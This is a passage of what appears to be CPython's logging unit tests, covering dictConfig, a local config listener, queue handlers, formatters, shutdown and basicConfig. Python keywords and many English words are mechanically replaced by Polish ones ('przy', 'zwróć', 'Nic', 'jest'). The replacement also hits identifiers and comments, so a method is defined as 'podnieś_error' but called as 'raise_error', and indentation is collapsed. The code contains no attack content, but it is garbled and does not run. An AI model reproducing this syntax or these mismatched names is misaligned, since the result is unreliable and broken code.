self.assert_log_lines([ ('INFO', '3'), ('ERROR', '4'), ('INFO', '5'), ('ERROR', '6'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config_8a_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config1a) logger = logging.getLogger("compiler.parser") # See issue #11424. compiler-hyphenated sorts # between compiler oraz compiler.xyz oraz this # was preventing compiler.xyz z being included # w the child loggers of compiler because of an # overzealous loop termination condition. hyphenated = logging.getLogger('compiler-hyphenated') # All will output a message logger.info(self.next_message()) logger.error(self.next_message()) hyphenated.critical(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ('CRITICAL', '3'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) przy support.captured_stdout() jako output: self.apply_config(self.config8a) logger = logging.getLogger("compiler.parser") self.assertNieprawda(logger.disabled) # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) logger = logging.getLogger("compiler.lexer") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) # Will nie appear hyphenated.critical(self.next_message()) self.assert_log_lines([ ('INFO', '4'), ('ERROR', '5'), ('INFO', '6'), ('ERROR', '7'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) def test_config_9_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config9) logger = logging.getLogger("compiler.parser") #Nothing will be output since both handler oraz logger are set to WARNING logger.info(self.next_message()) self.assert_log_lines([], stream=output) self.apply_config(self.config9a) #Nothing will be output since both handler jest still set to WARNING logger.info(self.next_message()) self.assert_log_lines([], stream=output) self.apply_config(self.config9b) #Message should now be output logger.info(self.next_message()) self.assert_log_lines([ ('INFO', '3'), ], stream=output) def test_config_10_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config10) logger = logging.getLogger("compiler.parser") logger.warning(self.next_message()) logger = logging.getLogger('compiler') #Not output, because filtered logger.warning(self.next_message()) logger = logging.getLogger('compiler.lexer') #Not output, because filtered logger.warning(self.next_message()) logger = logging.getLogger("compiler.parser.codegen") #Output, jako nie filtered logger.error(self.next_message()) self.assert_log_lines([ ('WARNING', '1'), ('ERROR', '4'), ], stream=output) def test_config11_ok(self): self.test_config1_ok(self.config11) def test_config12_failure(self): self.assertRaises(Exception, self.apply_config, self.config12) def test_config13_failure(self): self.assertRaises(Exception, self.apply_config, self.config13) def test_config14_ok(self): przy support.captured_stdout() jako output: self.apply_config(self.config14) h = logging._handlers['hand1'] self.assertEqual(h.foo, 'bar') self.assertEqual(h.terminator, '!\n') logging.warning('Exclamation') self.assertPrawda(output.getvalue().endswith('Exclamation!\n')) @unittest.skipUnless(threading, 'listen() needs threading to work') def setup_via_listener(self, text, verify=Nic): text = text.encode("utf-8") # Ask dla a randomly assigned port (by using port 0) t = logging.config.listen(0, verify) t.start() t.ready.wait() # Now get the port allocated port = t.port t.ready.clear() spróbuj: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(2.0) sock.connect(('localhost', port)) slen = struct.pack('>L', len(text)) s = slen + text sentsofar = 0 left = len(s) dopóki left > 0: sent = sock.send(s[sentsofar:]) sentsofar += sent left -= sent sock.close() w_końcu: t.ready.wait(2.0) logging.config.stopListening() t.join(2.0) @unittest.skipUnless(threading, 'Threading required dla this test.') def test_listen_config_10_ok(self): przy support.captured_stdout() jako output: self.setup_via_listener(json.dumps(self.config10)) logger = logging.getLogger("compiler.parser") logger.warning(self.next_message()) logger = logging.getLogger('compiler') #Not output, because filtered logger.warning(self.next_message()) logger = logging.getLogger('compiler.lexer') #Not output, because filtered logger.warning(self.next_message()) logger = logging.getLogger("compiler.parser.codegen") #Output, jako nie filtered logger.error(self.next_message()) self.assert_log_lines([ ('WARNING', '1'), ('ERROR', '4'), ], stream=output) @unittest.skipUnless(threading, 'Threading required dla this test.') def test_listen_config_1_ok(self): przy support.captured_stdout() jako output: self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1)) logger = logging.getLogger("compiler.parser") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], stream=output) # Original logger output jest empty. self.assert_log_lines([]) @unittest.skipUnless(threading, 'Threading required dla this test.') def test_listen_verify(self): def verify_fail(stuff): zwróć Nic def verify_reverse(stuff): zwróć stuff[::-1] logger = logging.getLogger("compiler.parser") to_send = textwrap.dedent(ConfigFileTest.config1) # First, specify a verification function that will fail. # We expect to see no output, since our configuration # never took effect. przy support.captured_stdout() jako output: self.setup_via_listener(to_send, verify_fail) # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([], stream=output) # Original logger output has the stuff we logged. self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], pat=r"^[\w.]+ -> (\w+): (\d+)$") # Now, perform no verification. Our configuration # should take effect. przy support.captured_stdout() jako output: self.setup_via_listener(to_send) # no verify callable specified logger = logging.getLogger("compiler.parser") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '3'), ('ERROR', '4'), ], stream=output) # Original logger output still has the stuff we logged before. self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], pat=r"^[\w.]+ -> (\w+): (\d+)$") # Now, perform verification which transforms the bytes. przy support.captured_stdout() jako output: self.setup_via_listener(to_send[::-1], verify_reverse) logger = logging.getLogger("compiler.parser") # Both will output a message logger.info(self.next_message()) logger.error(self.next_message()) self.assert_log_lines([ ('INFO', '5'), ('ERROR', '6'), ], stream=output) # Original logger output still has the stuff we logged before. self.assert_log_lines([ ('INFO', '1'), ('ERROR', '2'), ], pat=r"^[\w.]+ -> (\w+): (\d+)$") def test_out_of_order(self): self.apply_config(self.out_of_order) handler = logging.getLogger('mymodule').handlers[0] self.assertIsInstance(handler.target, logging.Handler) self.assertIsInstance(handler.formatter._style, logging.StringTemplateStyle) def test_baseconfig(self): d = { 'atuple': (1, 2, 3), 'alist': ['a', 'b', 'c'], 'adict': {'d': 'e', 'f': 3 }, 'nest1': ('g', ('h', 'i'), 'j'), 'nest2': ['k', ['l', 'm'], 'n'], 'nest3': ['o', 'cfg://alist', 'p'], } bc = logging.config.BaseConfigurator(d) self.assertEqual(bc.convert('cfg://atuple[1]'), 2) self.assertEqual(bc.convert('cfg://alist[1]'), 'b') self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h') self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm') self.assertEqual(bc.convert('cfg://adict.d'), 'e') self.assertEqual(bc.convert('cfg://adict[f]'), 3) v = bc.convert('cfg://nest3') self.assertEqual(v.pop(1), ['a', 'b', 'c']) self.assertRaises(KeyError, bc.convert, 'cfg://nosuch') self.assertRaises(ValueError, bc.convert, 'cfg://!') self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]') klasa ManagerTest(BaseTest): def test_manager_loggerclass(self): logged = [] klasa MyLogger(logging.Logger): def _log(self, level, msg, args, exc_info=Nic, extra=Nic): logged.append(msg) man = logging.Manager(Nic) self.assertRaises(TypeError, man.setLoggerClass, int) man.setLoggerClass(MyLogger) logger = man.getLogger('test') logger.warning('should appear w logged') logging.warning('should nie appear w logged') self.assertEqual(logged, ['should appear w logged']) def test_set_log_record_factory(self): man = logging.Manager(Nic) expected = object() man.setLogRecordFactory(expected) self.assertEqual(man.logRecordFactory, expected) klasa ChildLoggerTest(BaseTest): def test_child_loggers(self): r = logging.getLogger() l1 = logging.getLogger('abc') l2 = logging.getLogger('def.ghi') c1 = r.getChild('xyz') c2 = r.getChild('uvw.xyz') self.assertIs(c1, logging.getLogger('xyz')) self.assertIs(c2, logging.getLogger('uvw.xyz')) c1 = l1.getChild('def') c2 = c1.getChild('ghi') c3 = l1.getChild('def.ghi') self.assertIs(c1, logging.getLogger('abc.def')) self.assertIs(c2, logging.getLogger('abc.def.ghi')) self.assertIs(c2, c3) klasa DerivedLogRecord(logging.LogRecord): dalej klasa LogRecordFactoryTest(BaseTest): def setUp(self): klasa CheckingFilter(logging.Filter): def __init__(self, cls): self.cls = cls def filter(self, record): t = type(record) jeżeli t jest nie self.cls: msg = 'Unexpected LogRecord type %s, expected %s' % (t, self.cls) podnieś TypeError(msg) zwróć Prawda BaseTest.setUp(self) self.filter = CheckingFilter(DerivedLogRecord) self.root_logger.addFilter(self.filter) self.orig_factory = logging.getLogRecordFactory() def tearDown(self): self.root_logger.removeFilter(self.filter) BaseTest.tearDown(self) logging.setLogRecordFactory(self.orig_factory) def test_logrecord_class(self): self.assertRaises(TypeError, self.root_logger.warning, self.next_message()) logging.setLogRecordFactory(DerivedLogRecord) self.root_logger.error(self.next_message()) self.assert_log_lines([ ('root', 'ERROR', '2'), ]) klasa QueueHandlerTest(BaseTest): # Do nie bother przy a logger name group. expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$" def setUp(self): BaseTest.setUp(self) self.queue = queue.Queue(-1) self.que_hdlr = logging.handlers.QueueHandler(self.queue) self.que_logger = logging.getLogger('que') self.que_logger.propagate = Nieprawda self.que_logger.setLevel(logging.WARNING) self.que_logger.addHandler(self.que_hdlr) def tearDown(self): self.que_hdlr.close() BaseTest.tearDown(self) def test_queue_handler(self): self.que_logger.debug(self.next_message()) self.assertRaises(queue.Empty, self.queue.get_nowait) self.que_logger.info(self.next_message()) self.assertRaises(queue.Empty, self.queue.get_nowait) msg = self.next_message() self.que_logger.warning(msg) data = self.queue.get_nowait() self.assertPrawda(isinstance(data, logging.LogRecord)) self.assertEqual(data.name, self.que_logger.name) self.assertEqual((data.msg, data.args), (msg, Nic)) @unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'), 'logging.handlers.QueueListener required dla this test') def test_queue_listener(self): handler = support.TestHandler(support.Matcher()) listener = logging.handlers.QueueListener(self.queue, handler) listener.start() spróbuj: self.que_logger.warning(self.next_message()) self.que_logger.error(self.next_message()) self.que_logger.critical(self.next_message()) w_końcu: listener.stop() self.assertPrawda(handler.matches(levelno=logging.WARNING, message='1')) self.assertPrawda(handler.matches(levelno=logging.ERROR, message='2')) self.assertPrawda(handler.matches(levelno=logging.CRITICAL, message='3')) handler.close() # Now test przy respect_handler_level set handler = support.TestHandler(support.Matcher()) handler.setLevel(logging.CRITICAL) listener = logging.handlers.QueueListener(self.queue, handler, respect_handler_level=Prawda) listener.start() spróbuj: self.que_logger.warning(self.next_message()) self.que_logger.error(self.next_message()) self.que_logger.critical(self.next_message()) w_końcu: listener.stop() self.assertNieprawda(handler.matches(levelno=logging.WARNING, message='4')) self.assertNieprawda(handler.matches(levelno=logging.ERROR, message='5')) self.assertPrawda(handler.matches(levelno=logging.CRITICAL, message='6')) ZERO = datetime.timedelta(0) klasa UTC(datetime.tzinfo): def utcoffset(self, dt): zwróć ZERO dst = utcoffset def tzname(self, dt): zwróć 'UTC' utc = UTC() klasa FormatterTest(unittest.TestCase): def setUp(self): self.common = { 'name': 'formatter.test', 'level': logging.DEBUG, 'pathname': os.path.join('path', 'to', 'dummy.ext'), 'lineno': 42, 'exc_info': Nic, 'func': Nic, 'msg': 'Message przy %d %s', 'args': (2, 'placeholders'), } self.variants = { } def get_record(self, name=Nic): result = dict(self.common) jeżeli name jest nie Nic: result.update(self.variants[name]) zwróć logging.makeLogRecord(result) def test_percent(self): # Test %-formatting r = self.get_record() f = logging.Formatter('${%(message)s}') self.assertEqual(f.format(r), '${Message przy 2 placeholders}') f = logging.Formatter('%(random)s') self.assertRaises(KeyError, f.format, r) self.assertNieprawda(f.usesTime()) f = logging.Formatter('%(asctime)s') self.assertPrawda(f.usesTime()) f = logging.Formatter('%(asctime)-15s') self.assertPrawda(f.usesTime()) f = logging.Formatter('asctime') self.assertNieprawda(f.usesTime()) def test_braces(self): # Test {}-formatting r = self.get_record() f = logging.Formatter('$%{message}%$', style='{') self.assertEqual(f.format(r), '$%Message przy 2 placeholders%$') f = logging.Formatter('{random}', style='{') self.assertRaises(KeyError, f.format, r) self.assertNieprawda(f.usesTime()) f = logging.Formatter('{asctime}', style='{') self.assertPrawda(f.usesTime()) f = logging.Formatter('{asctime!s:15}', style='{') self.assertPrawda(f.usesTime()) f = logging.Formatter('{asctime:15}', style='{') self.assertPrawda(f.usesTime()) f = logging.Formatter('asctime', style='{') self.assertNieprawda(f.usesTime()) def test_dollars(self): # Test $-formatting r = self.get_record() f = logging.Formatter('$message', style='$') self.assertEqual(f.format(r), 'Message przy 2 placeholders') f = logging.Formatter('$$%${message}%$$', style='$') self.assertEqual(f.format(r), '$%Message przy 2 placeholders%$') f = logging.Formatter('${random}', style='$') self.assertRaises(KeyError, f.format, r) self.assertNieprawda(f.usesTime()) f = logging.Formatter('${asctime}', style='$') self.assertPrawda(f.usesTime()) f = logging.Formatter('${asctime', style='$') self.assertNieprawda(f.usesTime()) f = logging.Formatter('$asctime', style='$') self.assertPrawda(f.usesTime()) f = logging.Formatter('asctime', style='$') self.assertNieprawda(f.usesTime()) def test_invalid_style(self): self.assertRaises(ValueError, logging.Formatter, Nic, Nic, 'x') def test_time(self): r = self.get_record() dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc) # We use Nic to indicate we want the local timezone # We're essentially converting a UTC time to local time r.created = time.mktime(dt.astimezone(Nic).timetuple()) r.msecs = 123 f = logging.Formatter('%(asctime)s %(message)s') f.converter = time.gmtime self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123') self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21') f.format(r) self.assertEqual(r.asctime, '1993-04-21 08:03:00,123') klasa TestBufferingFormatter(logging.BufferingFormatter): def formatHeader(self, records): zwróć '[(%d)' % len(records) def formatFooter(self, records): zwróć '(%d)]' % len(records) klasa BufferingFormatterTest(unittest.TestCase): def setUp(self): self.records = [ logging.makeLogRecord({'msg': 'one'}), logging.makeLogRecord({'msg': 'two'}), ] def test_default(self): f = logging.BufferingFormatter() self.assertEqual('', f.format([])) self.assertEqual('onetwo', f.format(self.records)) def test_custom(self): f = TestBufferingFormatter() self.assertEqual('[(2)onetwo(2)]', f.format(self.records)) lf = logging.Formatter('<%(message)s>') f = TestBufferingFormatter(lf) self.assertEqual('[(2)<one><two>(2)]', f.format(self.records)) klasa ExceptionTest(BaseTest): def test_formatting(self): r = self.root_logger h = RecordingHandler() r.addHandler(h) spróbuj: podnieś RuntimeError('deliberate mistake') wyjąwszy: logging.exception('failed', stack_info=Prawda) r.removeHandler(h) h.close() r = h.records[0] self.assertPrawda(r.exc_text.startswith('Traceback (most recent ' 'call last):\n')) self.assertPrawda(r.exc_text.endswith('\nRuntimeError: ' 'deliberate mistake')) self.assertPrawda(r.stack_info.startswith('Stack (most recent ' 'call last):\n')) self.assertPrawda(r.stack_info.endswith('logging.exception(\'failed\', ' 'stack_info=Prawda)')) klasa LastResortTest(BaseTest): def test_last_resort(self): # Test the last resort handler root = self.root_logger root.removeHandler(self.root_hdlr) old_lastresort = logging.lastResort old_raise_exceptions = logging.raiseExceptions spróbuj: przy support.captured_stderr() jako stderr: root.debug('This should nie appear') self.assertEqual(stderr.getvalue(), '') root.warning('Final chance!') self.assertEqual(stderr.getvalue(), 'Final chance!\n') # No handlers oraz no last resort, so 'No handlers' message logging.lastResort = Nic przy support.captured_stderr() jako stderr: root.warning('Final chance!') msg = 'No handlers could be found dla logger "root"\n' self.assertEqual(stderr.getvalue(), msg) # 'No handlers' message only printed once przy support.captured_stderr() jako stderr: root.warning('Final chance!') self.assertEqual(stderr.getvalue(), '') # If podnieśExceptions jest Nieprawda, no message jest printed root.manager.emittedNoHandlerWarning = Nieprawda logging.raiseExceptions = Nieprawda przy support.captured_stderr() jako stderr: root.warning('Final chance!') self.assertEqual(stderr.getvalue(), '') w_końcu: root.addHandler(self.root_hdlr) logging.lastResort = old_lastresort logging.raiseExceptions = old_raise_exceptions klasa FakeHandler: def __init__(self, identifier, called): dla method w ('acquire', 'flush', 'close', 'release'): setattr(self, method, self.record_call(identifier, method, called)) def record_call(self, identifier, method_name, called): def inner(): called.append('{} - {}'.format(identifier, method_name)) zwróć inner klasa RecordingHandler(logging.NullHandler): def __init__(self, *args, **kwargs): super(RecordingHandler, self).__init__(*args, **kwargs) self.records = [] def handle(self, record): """Keep track of all the emitted records.""" self.records.append(record) klasa ShutdownTest(BaseTest): """Test suite dla the shutdown method.""" def setUp(self): super(ShutdownTest, self).setUp() self.called = [] podnieś_exceptions = logging.raiseExceptions self.addCleanup(setattr, logging, 'raiseExceptions', podnieś_exceptions) def podnieś_error(self, error): def inner(): podnieś error() zwróć inner def test_no_failure(self): # create some fake handlers handler0 = FakeHandler(0, self.called) handler1 = FakeHandler(1, self.called) handler2 = FakeHandler(2, self.called) # create live weakref to those handlers handlers = map(logging.weakref.ref, [handler0, handler1, handler2]) logging.shutdown(handlerList=list(handlers)) expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release', '1 - acquire', '1 - flush', '1 - close', '1 - release', '0 - acquire', '0 - flush', '0 - close', '0 - release'] self.assertEqual(expected, self.called) def _test_with_failure_in_method(self, method, error): handler = FakeHandler(0, self.called) setattr(handler, method, self.raise_error(error)) handlers = [logging.weakref.ref(handler)] logging.shutdown(handlerList=list(handlers)) self.assertEqual('0 - release', self.called[-1]) def test_with_ioerror_in_acquire(self): self._test_with_failure_in_method('acquire', OSError) def test_with_ioerror_in_flush(self): self._test_with_failure_in_method('flush', OSError) def test_with_ioerror_in_close(self): self._test_with_failure_in_method('close', OSError) def test_with_valueerror_in_acquire(self): self._test_with_failure_in_method('acquire', ValueError) def test_with_valueerror_in_flush(self): self._test_with_failure_in_method('flush', ValueError) def test_with_valueerror_in_close(self): self._test_with_failure_in_method('close', ValueError) def test_with_other_error_in_acquire_without_raise(self): logging.raiseExceptions = Nieprawda self._test_with_failure_in_method('acquire', IndexError) def test_with_other_error_in_flush_without_raise(self): logging.raiseExceptions = Nieprawda self._test_with_failure_in_method('flush', IndexError) def test_with_other_error_in_close_without_raise(self): logging.raiseExceptions = Nieprawda self._test_with_failure_in_method('close', IndexError) def test_with_other_error_in_acquire_with_raise(self): logging.raiseExceptions = Prawda self.assertRaises(IndexError, self._test_with_failure_in_method, 'acquire', IndexError) def test_with_other_error_in_flush_with_raise(self): logging.raiseExceptions = Prawda self.assertRaises(IndexError, self._test_with_failure_in_method, 'flush', IndexError) def test_with_other_error_in_close_with_raise(self): logging.raiseExceptions = Prawda self.assertRaises(IndexError, self._test_with_failure_in_method, 'close', IndexError) klasa ModuleLevelMiscTest(BaseTest): """Test suite dla some module level methods.""" def test_disable(self): old_disable = logging.root.manager.disable # confirm our assumptions are correct self.assertEqual(old_disable, 0) self.addCleanup(logging.disable, old_disable) logging.disable(83) self.assertEqual(logging.root.manager.disable, 83) def _test_log(self, method, level=Nic): called = [] support.patch(self, logging, 'basicConfig', lambda *a, **kw: called.append((a, kw))) recording = RecordingHandler() logging.root.addHandler(recording) log_method = getattr(logging, method) jeżeli level jest nie Nic: log_method(level, "test me: %r", recording) inaczej: log_method("test me: %r", recording) self.assertEqual(len(recording.records), 1) record = recording.records[0] self.assertEqual(record.getMessage(), "test me: %r" % recording) expected_level = level jeżeli level jest nie Nic inaczej getattr(logging, method.upper()) self.assertEqual(record.levelno, expected_level) # basicConfig was nie called! self.assertEqual(called, []) def test_log(self): self._test_log('log', logging.ERROR) def test_debug(self): self._test_log('debug') def test_info(self): self._test_log('info') def test_warning(self): self._test_log('warning') def test_error(self): self._test_log('error') def test_critical(self): self._test_log('critical') def test_set_logger_class(self): self.assertRaises(TypeError, logging.setLoggerClass, object) klasa MyLogger(logging.Logger): dalej logging.setLoggerClass(MyLogger) self.assertEqual(logging.getLoggerClass(), MyLogger) logging.setLoggerClass(logging.Logger) self.assertEqual(logging.getLoggerClass(), logging.Logger) def test_logging_at_shutdown(self): # Issue #20037 code = """jeżeli 1: zaimportuj logging klasa A: def __del__(self): spróbuj: podnieś ValueError("some error") wyjąwszy Exception: logging.exception("exception w __del__") a = A()""" rc, out, err = assert_python_ok("-c", code) err = err.decode() self.assertIn("exception w __del__", err) self.assertIn("ValueError: some error", err) klasa LogRecordTest(BaseTest): def test_str_rep(self): r = logging.makeLogRecord({}) s = str(r) self.assertPrawda(s.startswith('<LogRecord: ')) self.assertPrawda(s.endswith('>')) def test_dict_arg(self): h = RecordingHandler() r = logging.getLogger() r.addHandler(h) d = {'less' : 'more' } logging.warning('less jest %(less)s', d) self.assertIs(h.records[0].args, d) self.assertEqual(h.records[0].message, 'less jest more') r.removeHandler(h) h.close() def test_multiprocessing(self): r = logging.makeLogRecord({}) self.assertEqual(r.processName, 'MainProcess') spróbuj: zaimportuj multiprocessing jako mp r = logging.makeLogRecord({}) self.assertEqual(r.processName, mp.current_process().name) wyjąwszy ImportError: dalej def test_optional(self): r = logging.makeLogRecord({}) NOT_NONE = self.assertIsNotNic jeżeli threading: NOT_NONE(r.thread) NOT_NONE(r.threadName) NOT_NONE(r.process) NOT_NONE(r.processName) log_threads = logging.logThreads log_processes = logging.logProcesses log_multiprocessing = logging.logMultiprocessing spróbuj: logging.logThreads = Nieprawda logging.logProcesses = Nieprawda logging.logMultiprocessing = Nieprawda r = logging.makeLogRecord({}) NONE = self.assertIsNic NONE(r.thread) NONE(r.threadName) NONE(r.process) NONE(r.processName) w_końcu: logging.logThreads = log_threads logging.logProcesses = log_processes logging.logMultiprocessing = log_multiprocessing klasa BasicConfigTest(unittest.TestCase): """Test suite dla logging.basicConfig.""" def setUp(self): super(BasicConfigTest, self).setUp() self.handlers = logging.root.handlers self.saved_handlers = logging._handlers.copy() self.saved_handler_list = logging._handlerList[:] self.original_logging_level = logging.root.level self.addCleanup(self.cleanup) logging.root.handlers = [] def tearDown(self): dla h w logging.root.handlers[:]: logging.root.removeHandler(h) h.close() super(BasicConfigTest, self).tearDown() def cleanup(self): setattr(logging.root, 'handlers', self.handlers) logging._handlers.clear() logging._handlers.update(self.saved_handlers) logging._handlerList[:] = self.saved_handler_list logging.root.level = self.original_logging_level def test_no_kwargs(self): logging.basicConfig() # handler defaults to a StreamHandler to sys.stderr self.assertEqual(len(logging.root.handlers), 1) handler = logging.root.handlers[0] self.assertIsInstance(handler, logging.StreamHandler) self.assertEqual(handler.stream, sys.stderr) formatter = handler.formatter # format defaults to logging.BASIC_FORMAT self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT) # datefmt defaults to Nic self.assertIsNic(formatter.datefmt) # style defaults to % self.assertIsInstance(formatter._style, logging.PercentStyle) # level jest nie explicitly set self.assertEqual(logging.root.level, self.original_logging_level) def test_strformatstyle(self): przy support.captured_stdout() jako output: logging.basicConfig(stream=sys.stdout, style="{") logging.error("Log an error") sys.stdout.seek(0) self.assertEqual(output.getvalue().strip(), "ERROR:root:Log an error") def test_stringtemplatestyle(self): przy support.captured_stdout() jako output: logging.basicConfig(stream=sys.stdout, style="$") logging.error("Log an error") sys.stdout.seek(0) self.assertEqual(output.getvalue().strip(), "ERROR:root:Log an error") def test_filename(self): def cleanup(h1, h2, fn): h1.close() h2.close() os.remove(fn) logging.basicConfig(filename='test.log') self.assertEqual(len(logging.root.handlers), 1) handler = logging.root.handlers[0] self.assertIsInstance(handler, logging.FileHandler) expected = logging.FileHandler('test.log', 'a') self.assertEqual(handler.stream.mode, expected.stream.mode) self.assertEqual(handler.stream.name, expected.stream.name) self.addCleanup(cleanup, handler, expected, 'test.log') def test_filemode(self): def cleanup(h1, h2, fn): h1.close() h2.close() os.remove(fn) logging.basicConfig(filename='test.log', filemode='wb') handler = logging.root.handlers[0] expected = logging.FileHandler('test.log', 'wb') self.assertEqual(handler.stream.mode, expected.stream.mode) self.addCleanup(cleanup, handler, expected, 'test.log') def test_stream(self): stream = io.StringIO() self.addCleanup(stream.close) logging.basicConfig(stream=stream) self.assertEqual(len(logging.root.handlers), 1) handler = logging.root.handlers[0] self.assertIsInstance(handler, logging.StreamHandler) self.assertEqual(handler.stream, stream) def test_format(self): logging.basicConfig(format='foo') formatter = logging.root.handlers[0].formatter self.assertEqual(formatter._style._fmt, 'foo') def test_datefmt(self): logging.basicConfig(datefmt='bar') formatter = logging.root.handlers[0].formatter self.assertEqual(formatter.datefmt, 'bar') def test_style(self): logging.basicConfig(style='$') formatter = logging.root.handlers[0].formatter self.assertIsInstance(formatter._style, logging.StringTemplateStyle) def test_level(self): old_level = logging.root.level self.addCleanup(logging.root.setLevel, old_level) logging.basicConfig(level=57) self.assertEqual(logging.root.level, 57) # Test that second call has no effect logging.basicConfig(level=58) self.assertEqual(logging.root.level, 57) def test_incompatible(self): assertRaises = self.assertRaises handlers = [logging.StreamHandler()] stream = sys.stderr assertRaises(ValueError, logging.basicConfig, filename='test.log', stream=stream) assertRaises(ValueError, logging.basicConfig, filename='test.log', handlers=handlers) assertRaises(ValueError, logging.basicConfig, stream=stream, handlers=handlers) # Issue 23207: test dla invalid kwargs assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO) # Should pop both filename oraz filemode even jeżeli filename jest Nic logging.basicConfig(filename=Nic, filemode='a') def test_handlers(self): handlers = [ logging.StreamHandler(), logging.StreamHandler(sys.stdout), logging.StreamHandler(), ] f = logging.Formatter() handlers[2].setFormatter(f) logging.basicConfig(handlers=handlers) self.assertIs(handlers[0], logging.root.handlers[0]) self.assertIs(handlers[1], logging.root.handlers[1]) self.assertIs(handlers[2], logging.root.handlers[2]) self.assertIsNotNic(handlers[0].formatter) self.assertIsNotNic(handlers[1].formatter) self.assertIs(handlers[2].formatter, f) self.assertIs(handlers[0].formatter, handlers[1].formatter) def _test_log(self, method, level=Nic): # logging.root has no handlers so basicConfig should be called called = [] old_basic_config = logging.basicConfig def my_basic_config(*a, **kw): old_basic_config() old_level = logging.root.level logging.root.setLevel(100) # avoid having messages w stderr self.addCleanup(logging.root.setLevel, old_level) called.append((a, kw)) support.patch(self, logging, 'basicConfig', my_basic_config) log_method = getattr(logging, method) jeżeli level jest nie Nic: log_method(level, "test me") inaczej: log_method("test me") # basicConfig was called przy no arguments self.assertEqual(called, [((), {})]) def test_log(self): self._test_log('log', logging.WARNING) def test_debug(self): self._test_log('debug') def test_info(self): self._test_log('info') def test_warning(self): self._test_log('warning') def test_error(self): self._test_log('error') def test_critical(self): self._test_log('critical') klasa LoggerAdapterTest(unittest.TestCase): def setUp(self): super(LoggerAdapterTest, self).setUp() old_handler_list = logging._handlerList[:] self.recording = RecordingHandler() self.logger = logging.root self.logger.addHandler(self.recording) self.addCleanup(self.logger.removeHandler, self.recording) self.addCleanup(self.recording.close) def cleanup(): logging._handlerList[:] = old_handler_list self.addCleanup(cleanup) self.addCleanup(logging.shutdown) self.adapter = logging.LoggerAdapter(logger=self.logger, extra=Nic) def test_exception(self): msg = 'testing exception: %r' exc = Nic spróbuj: 1 / 0 wyjąwszy ZeroDivisionError jako e: exc = e self.adapter.exception(msg, self.recording) self.assertEqual(len(self.recording.records), 1) record = self.recording.records[0] self.assertEqual(record.levelno, logging.ERROR) self.assertEqual(record.msg, msg) self.assertEqual(record.args, (self.recording,)) self.assertEqual(record.exc_info, (exc.__class__, exc, exc.__traceback__)) def test_exception_excinfo(self): spróbuj: 1 / 0 wyjąwszy ZeroDivisionError jako e: exc = e self.adapter.exception('exc_info test', exc_info=exc) self.assertEqual(len(self.recording.records), 1) record = self.recording.records[0] self.assertEqual(record.exc_info, (exc.__class__, exc, exc.__traceback__)) def test_critical(self): msg = 'critical test! %r' self.adapter.critical(msg, self.recording) self.assertEqual(len(self.recording.records), 1) record = self.recording.records[0] self.assertEqual(record.levelno, logging.CRITICAL) self.assertEqual(record.msg, msg) self.assertEqual(record.args, (self.recording,)) def test_is_enabled_for(self): old_disable = self.adapter.logger.manager.disable self.adapter.logger.manager.disable = 33 self.addCleanup(setattr, self.adapter.logger.manager, 'disable', old_disable) self.assertNieprawda(self.adapter.isEnabledFor(32)) def test_has_handlers(self): self.assertPrawda(self.adapter.hasHandlers()) dla handler w self.logger.handlers: self.logger.removeHandler(handler) self.assertNieprawda(self.logger.hasHandlers()) self.assertNieprawda(self.adapter.hasHandlers()) klasa LoggerTest(BaseTest): def setUp(self): super(LoggerTest, self).setUp() self.recording = RecordingHandler() self.logger = logging.Logger(name='blah') self.logger.addHandler(self.recording) self.addCleanup(self.logger.removeHandler, self.recording) self.addCleanup(self.recording.close) self.addCleanup(logging.shutdown) def test_set_invalid_level(self): self.assertRaises(TypeError, self.logger.setLevel, object()) def test_exception(self): msg = 'testing exception: %r' exc = Nic spróbuj: 1 / 0 wyjąwszy ZeroDivisionError jako e: exc = e self.logger.exception(msg, self.recording) self.assertEqual(len(self.recording.records), 1) record = self.recording.records[0] self.assertEqual(record.levelno, logging.ERROR) self.assertEqual(record.msg, msg) self.assertEqual(record.args, (self.recording,)) self.assertEqual(record.exc_info, (exc.__class__, exc, exc.__traceback__)) def test_log_invalid_level_with_raise(self): przy support.swap_attr(logging, 'raiseExceptions', Prawda): self.assertRaises(TypeError, self.logger.log, '10', 'test message') def test_log_invalid_level_no_raise(self): przy support.swap_attr(logging, 'raiseExceptions', Nieprawda): self.logger.log('10', 'test message') # no exception happens def test_find_caller_with_stack_info(self): called = [] support.patch(self, logging.traceback, 'print_stack', lambda f, file: called.append(file.getvalue())) self.logger.findCaller(stack_info=Prawda) self.assertEqual(len(called), 1) self.assertEqual('Stack (most recent call last):\n', called[0]) def test_make_record_with_extra_overwrite(self): name = 'my record' level = 13 fn = lno = msg = args = exc_info = func = sinfo = Nic rv = logging._logRecordFactory(name, level, fn, lno, msg, args, exc_info, func, sinfo) dla key w ('message', 'asctime') + tuple(rv.__dict__.keys()): extra = {key: 'some value'} self.assertRaises(KeyError, self.logger.makeRecord, name, level, fn, lno, msg, args, exc_info, extra=extra, sinfo=sinfo) def test_make_record_with_extra_no_overwrite(self): name = 'my record' level = 